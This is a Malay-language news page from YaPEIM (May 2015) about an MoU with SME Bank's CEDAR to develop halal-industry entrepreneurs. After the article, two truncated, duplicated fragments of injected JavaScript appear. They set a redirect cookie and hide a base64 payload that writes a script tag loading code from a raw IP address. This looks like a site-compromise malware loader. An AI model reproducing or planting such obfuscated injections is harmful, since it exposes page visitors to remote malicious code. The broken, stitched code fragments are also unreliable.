YaPEIM » YaPEIM Ajak SME Bank Bangunkan Usahawan Industri Halal

Terkini

YaPEIM Ajak SME Bank Bangunkan Usahawan Industri Halal

YaPEIM, SME BANK, Halal

KUALA LUMPUR, 29 Mei 2015:  YaPEIM mengajak Kumpulan SME Bank untuk bersama-sama membangunkan usahawan muslim dalam industri dan perniagaan berasaskan halal.

Presiden YaPEIM, Dato’ Abd Malek Awang Kechil, berkata YaPEIM melalui Pusat Pembangunan Usahawannya (YEC) telah memulakan inisiatif dengan pihak hub halal Jakim dalam usaha membangunkan usahawan baru dalam indutri berkenaan.

Abd Malek yang juga Pengerusi Lembaga Pemegang Amanah YaPEIM berkata, YaPEIM dan SME Bank melalui CEDAR bakal membentuk model nasional yang boleh memberi impak besar dalam konteks pembangunan usahawan di negara ini.

“MoU ini akan membuka pintu seluas-luasnya kepada kerjasama strategik yang berterusan, demi menjayakan visi dan misi kumpulan institusi kita.

“Malah, apa yang lebih penting ialah pembangunan ummah dan negara kita pada masa depan,” katanya ketika majlis menandatangani MoU di antara YaPEIM dan Centre for Entreprenuer Development and Reseach (CEDAR) SME Bank, di sini hari ini.

MoU berkenaan ditandatangani oleh Ketua Pegawai Operasi CEDAR, Dr Sheik Ghazali Abod dan Ketua Pengarah YaPEIM, Dato’ Abibullah Hj Samsudin sambil disaksikan oleh Abdul Malek dan Pengarah Urusan SME Bank, Dato’ Mohd Radzif Mohd Yunus.

Abd Malek berkata, gabungan kekuatan dua institusi Kumpulan SME Bank yang terbabit dalam pembangunan insustri kecil dan sederhana dan YaPEIM sebagai institusi pembangunan sosio-ekonomi ummah, mampu digerakkan dalam membangunkan kumpulan sasar.

“YaPEIM mempunyai YEC yang memberi fokus kepada pembangunan usahawan dan INPUT YaPEIM yang berfokuskan kepada pembangunan perniagaan berasaskan emas dengan kerjasama CEDAR, dapat mewujudkan usaha sama kontruktif.

“Ia akan memberi nilai tambah kepada perniagaan dan produk yang ingin dimajukan, termasuk dari segi sokongan pinjaman kewangan,”   katanya.

Selain itu, katanya, kerjasama dengan CEDAR boleh merangkumi program rangkaian YaPEIM S’Mart yang digerakkan oleh Koperasi di bawah YaPEIM, agar terus menjadi rangkaian pemasaran kepada produk tulen dan halal.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top